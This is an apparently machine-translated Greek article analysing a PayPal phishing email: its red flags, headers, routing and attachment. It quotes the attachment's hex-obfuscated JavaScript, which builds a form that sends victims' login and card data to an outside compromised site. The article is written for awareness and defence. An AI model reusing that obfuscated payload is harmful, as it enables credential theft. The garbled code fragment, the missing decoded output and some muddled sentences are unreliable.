Ηλεκτρονική ασφάλεια που καταστρέφει την ανατομία ενός μηνύματος ηλεκτρονικού ψαρέματος (phishing)
Στον σημερινό κόσμο όπου οι πληροφορίες του καθενός είναι ηλεκτρονικές, το ηλεκτρονικό ψάρεμα είναι μία από τις πιο δημοφιλείς και καταστροφικές επιθέσεις στο διαδίκτυο, επειδή μπορείτε πάντα να καθαρίσετε έναν ιό, αλλά αν κλαπούν τα τραπεζικά σας στοιχεία, έχετε πρόβλημα. Ακολουθεί μια ανάλυση μιας τέτοιας επίθεσης που λάβαμε.
Μην νομίζετε ότι είναι μόνο οι τραπεζικές σας λεπτομέρειες που είναι σημαντικές: τελικά, αν κάποιος αποκτήσει τον έλεγχο του λογαριασμού σας, δεν γνωρίζει μόνο τις πληροφορίες που περιέχονται σε αυτόν τον λογαριασμό, αλλά οι πιθανότητες είναι ότι οι ίδιες πληροφορίες σύνδεσης μπορούν να χρησιμοποιηθούν σε διάφορα άλλα λογαριασμούς. Και αν υπονομεύσουν τον λογαριασμό ηλεκτρονικού ταχυδρομείου σας, μπορούν να επαναφέρουν όλους τους άλλους κωδικούς πρόσβασης.
Έτσι, εκτός από τη διατήρηση ισχυρών και ποικίλων κωδικών πρόσβασης, πρέπει πάντα να είστε επιφυλακτικοί για τα ψεύτικα μηνύματα που μεταμφιέζονται ως το πραγματικό πράγμα. Ενώ οι περισσότερες απόπειρες ηλεκτρονικού "ψαρέματος" είναι ερασιτεχνικές, μερικές είναι αρκετά πειστικές, γι 'αυτό είναι σημαντικό να κατανοήσουμε πώς να τις αναγνωρίσουμε στο επίπεδο της επιφάνειας καθώς και πώς δουλεύουν κάτω από την κουκούλα.
Εικόνα από asirap
Εξετάζοντας τι είναι στην απλή ματιά
Το παράδειγμα ηλεκτρονικού ταχυδρομείου μας, όπως και οι περισσότερες απόπειρες ηλεκτρονικού "ψαρέματος", "σας ειδοποιεί" για δραστηριότητα στον λογαριασμό σας στο PayPal, η οποία υπό κανονικές συνθήκες θα ήταν ανησυχητική. Έτσι, η πρόσκληση για δράση είναι να επαληθεύσετε / επαναφέρετε τον λογαριασμό σας, υποβάλλοντας σχεδόν κάθε προσωπική πληροφορία που μπορείτε να σκεφτείτε. Και πάλι, αυτό είναι αρκετά τυπολογικό.
Παρόλο που υπάρχουν σίγουρα εξαιρέσεις, σχεδόν όλα τα μηνύματα ηλεκτρονικού "ψαρέματος" και ηλεκτρονικού ταχυδρομείου απάτης φορτώνονται με κόκκινες σημαίες απευθείας στο ίδιο το μήνυμα. Ακόμα κι αν το κείμενο είναι πειστικό, συνήθως μπορείτε να βρείτε πολλά λάθη γεμάτα σε όλο το σώμα του μηνύματος που δείχνουν ότι το μήνυμα δεν είναι νόμιμο.
Το Σώμα Μήνυμα
Με την πρώτη ματιά, αυτό είναι ένα από τα καλύτερα ηλεκτρονικά μηνύματα ηλεκτρονικού ψαρέματος που έχω δει. Δεν υπάρχουν ορθογραφικά ή γραμματικά λάθη και το verbiage διαβάζεται σύμφωνα με αυτό που θα περίμενε κανείς. Ωστόσο, υπάρχουν μερικές κόκκινες σημαίες που μπορείτε να δείτε όταν εξετάζετε το περιεχόμενο λίγο πιο στενά.
- "Paypal" - Η σωστή περίπτωση είναι "PayPal" (κεφάλαιο P). Μπορείτε να δείτε και τις δύο παραλλαγές που χρησιμοποιούνται στο μήνυμα. Οι εταιρείες είναι πολύ εσκεμμένες με το branding τους, οπότε είναι αμφίβολο κάτι τέτοιο θα περάσει τη διαδικασία proofing.
- "Allow ActiveX" - Πόσες φορές έχετε δει μια νόμιμη επιχείρηση βασισμένη στο web το μέγεθος του Paypal να χρησιμοποιεί ένα ιδιόκτητο στοιχείο που λειτουργεί μόνο σε ένα μόνο πρόγραμμα περιήγησης, ειδικά όταν υποστηρίζει πολλαπλά προγράμματα περιήγησης; Σίγουρα, κάπου εκεί έξω κάποια εταιρεία το κάνει, αλλά αυτή είναι μια κόκκινη σημαία.
- "Ασφαλώς." - Παρατηρήστε πώς αυτή η λέξη δεν ευθυγραμμίζεται στο περιθώριο με το υπόλοιπο κείμενο της παραγράφου. Ακόμη και αν τεντώσω το παράθυρο λίγο περισσότερο, δεν τυλίγεται ή διαστήματος σωστά.
- "Paypal!" - Ο χώρος πριν το θαυμαστικό μοιάζει άβολο. Ακριβώς μια άλλη ιδιορρυθμία που είμαι σίγουρος ότι δεν θα ήταν σε ένα νόμιμο ηλεκτρονικό ταχυδρομείο.
- "PayPal- Ενημέρωση λογαριασμού Form.pdf.htm" - Γιατί Paypal επισυνάψετε ένα "PDF" ειδικά όταν θα μπορούσαν απλώς να συνδεθούν με μια σελίδα στην περιοχή τους; Επιπλέον, γιατί θα προσπαθούσαν να αποκρύψουν ένα αρχείο HTML ως PDF; Αυτή είναι η μεγαλύτερη κόκκινη σημαία όλων αυτών.
Η κεφαλίδα μηνυμάτων
Όταν ρίξετε μια ματιά στην κεφαλίδα του μηνύματος, εμφανίζονται μερικές άλλες κόκκινες σημαίες:
- Η διεύθυνση είναι [email protected].
- Η διεύθυνση που λείπει λείπει. Δεν το έκανα κενό, απλά δεν είναι μέρος της βασικής κεφαλίδας μηνύματος. Συνήθως μια εταιρεία που έχει το όνομά σας θα προσαρμόσει το μήνυμα ηλεκτρονικού ταχυδρομείου σε εσάς.
Το συνημμένο
Όταν ανοίγω το συνημμένο, μπορείτε να δείτε αμέσως ότι η διάταξη δεν είναι σωστή καθώς λείπουν πληροφορίες στυλ. Και πάλι, γιατί το PayPal θα στείλει μέσω ηλεκτρονικού ταχυδρομείου μια φόρμα HTML, όταν θα μπορούσαν απλά να σας δώσουν έναν σύνδεσμο στον ιστότοπό τους?
Σημείωση: χρησιμοποιήσαμε το ενσωματωμένο πρόγραμμα προβολής συνημμένων HTML του Gmail γι 'αυτό, αλλά συνιστούμε να μην ΑΝΟΙΧΤΕ συνημμένα από απατεώνες. Ποτέ. Πάντα. Συχνά περιέχουν υποθέσεις που θα εγκαταστήσουν trojans στον υπολογιστή σας για να κλέψουν τα στοιχεία του λογαριασμού σας.
Μεταβαίνοντας λίγο περισσότερο μπορείτε να δείτε ότι αυτή η φόρμα δεν ζητά μόνο τις πληροφορίες σύνδεσης του PayPal, αλλά και τις πληροφορίες για τις τραπεζικές και πιστωτικές κάρτες. Ορισμένες από τις εικόνες είναι σπασμένες.
Είναι προφανές ότι αυτή η απόπειρα phishing πηγαίνει μετά από τα πάντα με ένα swoop.
Η τεχνική κατανομή
Ενώ θα πρέπει να είναι αρκετά σαφές με βάση αυτό που είναι απλά ότι αυτό είναι μια απόπειρα ηλεκτρονικού "ψαρέματος", τώρα πρόκειται να σπάσουμε το τεχνικό makeup του ηλεκτρονικού ταχυδρομείου και να δούμε τι μπορούμε να βρούμε.
Πληροφορίες από το συνημμένο
Το πρώτο πράγμα που πρέπει να ρίξετε μια ματιά είναι η πηγή HTML της φόρμας συνημμένου, που είναι αυτό που υποβάλλει τα δεδομένα στην πλαστή τοποθεσία.
Όταν βλέπετε γρήγορα την πηγή, όλοι οι σύνδεσμοι φαίνονται έγκυροι, καθώς δείχνουν είτε "paypal.com" ή "paypalobjects.com" που είναι και τα δύο legit.
Τώρα θα ρίξουμε μια ματιά σε μερικές βασικές πληροφορίες σελίδας που συγκεντρώνει ο Firefox στη σελίδα.
Όπως μπορείτε να δείτε, μερικά από τα γραφικά τραβιούνται από τους τομείς "blessedtobe.com", "goodhealthpharmacy.com" και "pic-upload.de" αντί των νόμιμων τομέων PayPal.
Πληροφορίες από τις κεφαλίδες Email
Στη συνέχεια, θα ρίξουμε μια ματιά στις ακατέργαστες κεφαλίδες μηνυμάτων ηλεκτρονικού ταχυδρομείου. Το Gmail το καθιστά διαθέσιμο μέσω της επιλογής μενού Εμφάνιση πρωτοτύπου στο μήνυμα.
Κοιτάζοντας τις πληροφορίες κεφαλίδας για το αρχικό μήνυμα, μπορείτε να δείτε ότι αυτό το μήνυμα συντάχθηκε χρησιμοποιώντας το Outlook Express 6. Αμφιβάλλω ότι το PayPal έχει κάποιον στο προσωπικό που στέλνει το καθένα από αυτά τα μηνύματα χειροκίνητα μέσω ενός ξεπερασμένου πελάτη ηλεκτρονικού ταχυδρομείου.
Εξετάζοντας τώρα τις πληροφορίες δρομολόγησης, μπορούμε να δούμε τη διεύθυνση IP τόσο του αποστολέα όσο και του διακομιστή αλληλογραφίας αναμετάδοσης.
Η διεύθυνση IP του χρήστη είναι αρχικός αποστολέας. Κάνοντας μια γρήγορη αναζήτηση στις πληροφορίες IP, μπορούμε να δούμε ότι η IP αποστολής βρίσκεται στη Γερμανία.
Και όταν εξετάζουμε τη διεύθυνση IP του διακομιστή αλληλογραφίας (mail.itak.at), μπορούμε να δούμε ότι πρόκειται για ISP που εδρεύει στην Αυστρία. Αμφιβάλλω ότι το PayPal δρομολογεί τα μηνύματα ηλεκτρονικού ταχυδρομείου τους απευθείας μέσω ενός ISP που εδρεύει στην Αυστρία όταν έχει ένα τεράστιο αγρόκτημα διακομιστών που θα μπορούσε εύκολα να χειριστεί αυτό το καθήκον.
Πού πηγαίνουν τα δεδομένα;?
Έτσι, έχουμε σαφώς διαπιστώσει ότι πρόκειται για ηλεκτρονικό μήνυμα ηλεκτρονικού "ψαρέματος" και συγκέντρωσε κάποιες πληροφορίες σχετικά με το πού προέρχεται το μήνυμα, αλλά τι γίνεται με το πού αποστέλλονται τα δεδομένα σας?
Για να δείτε αυτό, πρέπει πρώτα να αποθηκεύσετε το συνημμένο HTM στην επιφάνεια εργασίας μας και να το ανοίξετε σε ένα πρόγραμμα επεξεργασίας κειμένου. Μετακινώντας μέσα από αυτό, όλα φαίνονται να είναι εντάξει, εκτός από όταν φτάσουμε σε μια ύποπτη αναζήτηση Javascript μπλοκ.
Διαγράφοντας την πλήρη πηγή του τελευταίου τμήματος του Javascript, βλέπουμε:
// Πνευματικά δικαιώματα © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =»3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e»? y =»? για (i = 0? i
Οποτεδήποτε βλέπετε μια μεγάλη μπερδεμένη σειρά από φαινομενικά τυχαία γράμματα και αριθμούς ενσωματωμένα σε ένα μπλοκ Javascript, είναι συνήθως κάτι ύποπτο. Κοιτάζοντας τον κώδικα, η μεταβλητή "x" ορίζεται σε αυτή τη μεγάλη συμβολοσειρά και στη συνέχεια αποκωδικοποιείται στη μεταβλητή "y". Το τελικό αποτέλεσμα της μεταβλητής "y" είναι στη συνέχεια γραμμένο στο έγγραφο ως HTML.
Δεδομένου ότι η μεγάλη σειρά αποτελείται από τους αριθμούς 0-9 και τα γράμματα a-f, είναι πιθανότατα κωδικοποιημένη μέσω μιας απλής μετατροπής ASCII σε Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Μεταφράζεται σε:
Δεν είναι τυχαίο ότι αυτό αποκωδικοποιεί σε μια έγκυρη ετικέτα φόρμας HTML που στέλνει τα αποτελέσματα όχι στο PayPal, αλλά σε έναν ιστότοπο απατεώνων.
Επιπλέον, όταν βλέπετε την πηγή HTML της φόρμας, θα δείτε ότι αυτή η ετικέτα φόρμας δεν είναι ορατή επειδή δημιουργείται δυναμικά μέσω του Javascript. Αυτός είναι ένας έξυπνος τρόπος για να αποκρύψετε τι κάνει στην πραγματικότητα το HTML αν κάποιος απλά θα δει την παραγόμενη πηγή του συνημμένου (όπως κάναμε νωρίτερα) σε αντίθεση με το άνοιγμα του συνημμένου απευθείας σε έναν επεξεργαστή κειμένου.
Τρέχοντας μια γρήγορη Whois στην παράνομη περιοχή, μπορούμε να δούμε ότι αυτό είναι ένα domain που φιλοξενείται σε ένα δημοφιλές web υποδοχής, 1and1.
Αυτό που ξεχωρίζει είναι ότι ο τομέας χρησιμοποιεί ένα αναγνωρίσιμο όνομα (σε αντίθεση με κάτι σαν το "dfh3sjhskjhw.net") και ο τομέας έχει καταχωριστεί για 4 χρόνια. Εξαιτίας αυτού, πιστεύω ότι αυτός ο τομέας ήταν πειρατεμένος και χρησιμοποιήθηκε ως πιόνι σε αυτή την απόπειρα phishing.
Ο κυνισμός είναι μια καλή άμυνα
Όταν πρόκειται να παραμείνετε ασφαλείς στο διαδίκτυο, ποτέ δεν πονάει να έχετε ένα καλό κυνισμό.
Ενώ είμαι βέβαιος ότι υπάρχουν περισσότερες κόκκινες σημαίες στο παράδειγμα ηλεκτρονικού ταχυδρομείου, αυτό που έχουμε επισημάνει παραπάνω είναι δείκτες που είδαμε μετά από λίγα μόνο λεπτά εξέτασης. Υποθετικά, εάν το επίπεδο επιφάνειας του ηλεκτρονικού ταχυδρομείου μιμηθεί το νόμιμο αντίγραφο του 100%, η τεχνική ανάλυση θα αποκαλύψει ακόμα την πραγματική του φύση. Αυτός είναι ο λόγος για τον οποίο είναι η εισαγωγή να είναι σε θέση να εξετάσει και το τι μπορείτε και δεν μπορείτε να δείτε.